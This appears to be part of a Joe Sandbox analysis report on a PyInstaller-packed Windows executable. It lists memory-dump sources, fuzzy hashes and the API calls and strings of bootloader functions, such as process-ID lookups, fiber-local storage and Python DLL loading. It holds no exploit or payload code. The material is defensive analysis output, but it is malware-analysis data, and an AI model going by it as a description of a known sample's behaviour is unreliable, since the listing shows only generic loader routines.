• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
• Instruction ID: 6ae0cf5baa093417a20021ca0618aaefd6792ed2195cb2806e943f1291da9b45
• Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
• Instruction Fuzzy Hash: BE317221B1A64291EE13BB069D006A5A3D5FF68BF4FE94635DE1D463C0EE3CE4448B24

Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
• Instruction ID: 796ce303beb9b4be6c1e9479fbbaca77649ece06acdcfdde21d698eb5fda0e84
• Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
• Instruction Fuzzy Hash: D7417421B18A8691EA12FB10EC152E9A313FF643A4FE04132EB5D47695DF3CE519CB60

APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF72C65351A,?,00000000,00007FF72C653F23), ref: 00007FF72C652AA0
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction ID: d4c003c454b633111998e97adf63469324c152fbf723e2234dec0d1069d84301
• Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction Fuzzy Hash: 7921A132A18B8292E722AB50BC417E6B3A5FB983D4F900136EE8D43659DF3CD149CA50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                  • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                  • Instruction ID: 22c0e5db78f66657727efbb6fbc4989aea53d76814ed5388e91f011f0e5ee254
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC219024B0C24381F95A73619E51239F163FFA47B0FA04738E87E066C6DE2DA4405F21
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                  • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                  • Instruction ID: c1cab2659841ab4b17ec5aefbb1dc03c87c7df249e3fecf0500bc6ca7902e583
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D119631B18A4286E751AB52FC55339A3A1FBA8BF4F400734DA5D877A4DF3CD4588B50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658EFD
                                                                                                                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658F5A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
                                                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658FE5
                                                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659044
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659055
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C65906A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                                                                                                                  • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                  • Instruction ID: 45aa486cb43e8da2c99fb29abee3855fa73dab5e373ef8af8e499d9eca07cd38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B341D662A1968281EA31AB11AC003BAB396FF99BE4F940539DF4D57789DF3DD501CF20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B2D7
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B30D
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B33A
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B34B
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B35C
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B377
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                  • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                  • Instruction ID: b528dea49729ec2de321f3305e8fcd7e978b44b48f469b021a3813d14ec907ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16118E24B0C243C2FA5A73215E5113DB163FFA47B0FA44738EA6E576D6DE2CA4415B21
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction ID: 1a293b21af12d5c7a05d2a9e3fd064be512ebb6b8f574076b13183a5b28a55a4
• Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction Fuzzy Hash: F131F662B1868152E721B761AC412E7A396FF987E4F900136EF8D83749EF3CD14ACA10
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
• Instruction ID: 292e865b91f1ef857576b84c42e0cea15a61e894af5280f7789b99ea8d095d60
• Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
• Instruction Fuzzy Hash: D031A472619A8284EB21EF21EC552FAB361FF99794F900135EA4E47B49DF3CD104CB10
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF72C65918F,?,00007FF72C653C55), ref: 00007FF72C652BA0
• MessageBoxW.USER32 ref: 00007FF72C652C2A
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
• Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
• Instruction ID: 5d3f22c610251f6ece640e35ebf42f2006ddb559cb5cd631cd3f015714843d58
• Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
• Instruction Fuzzy Hash: DB21D122708B4292E712AB54F8457AAB3A6FB987D4F800136EE8D53659DE3CD219CB50
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF72C651B99), ref: 00007FF72C652760
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
• Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
• Instruction ID: 232d3d0a5cfeb901089f2024ed04681c0f1170c3fc9ebe893d224d8437097657
• Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
• Instruction Fuzzy Hash: CF21B232A18B8292E721EB50BC417E6B3A5FB983E4F900136FE8D43659DF7CD1498B50
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
• Instruction ID: ae81148a40a3e58e71dc2da579647c5ac35ce6a7802ebd3fccee1782f7d5053d
• Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
• Instruction Fuzzy Hash: B7F0C82170870781EA15AB10EC4933AA371FF94770F940639CA6E455E4DF2CD48CCB20
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction ID: c0fc834633b997149547d233c601b28d733ff1fad658722d3fa7980960768f62
• Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction Fuzzy Hash: EF119632D58A0201FA567165EC9337990D3FF7C378E880E34E76E06AD58E6C9849CE20
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3AF
• FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3CE
• FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3F6
• FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B407
• FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B418
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                  • Instruction ID: 50677f509f3fe0502c9133559968d4331df57f5656ab6f5dd6a059a279eaf794
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9116330F0864381F95AB3665E51239B163FFA47B0FE44338E97D466CADE2CA4415A21
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                  • Instruction ID: 91aff1a4218b12280ddb1d21c226ababfb5afb4d7add09cf78fe9f9f70166706
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C110D24A0C20785F99A72614D51179B2A7FFA5330FA4473CE97E456C2DE2DB4815A31
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                  • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                  • Instruction ID: 4d3c2c19871df30d0da8be690ca060c8999831cb4cf82644c868f4712a798c62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0591F532A0CA4641E722AE29EC5037DF6B6FB60B64FE44139DA5D433C5DE3DE4458B20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
